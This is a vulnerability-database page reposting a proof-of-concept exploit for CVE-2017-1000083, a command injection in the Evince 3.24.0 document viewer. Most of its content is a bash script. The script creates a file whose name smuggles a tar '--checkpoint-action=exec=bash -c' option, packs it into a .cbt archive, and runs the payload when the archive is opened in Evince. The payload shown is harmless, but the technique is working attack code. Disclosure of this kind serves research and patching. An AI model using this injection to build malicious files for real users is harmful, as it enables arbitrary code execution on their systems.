Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Evince 3.24.0 Command Injection

Related Vulnerabilities: CVE-2017-1000083   CVE-2017-1000083  
Publish Date: 13 Nov 2018
Author: Matlink
Source 
                							

                # Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083
 
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
 
#! /bin/bash
 
# define the payload
export PAYLOAD="firefox google.com"
 
# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg
 
# Run the malicious file
evince poc.cbt


<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started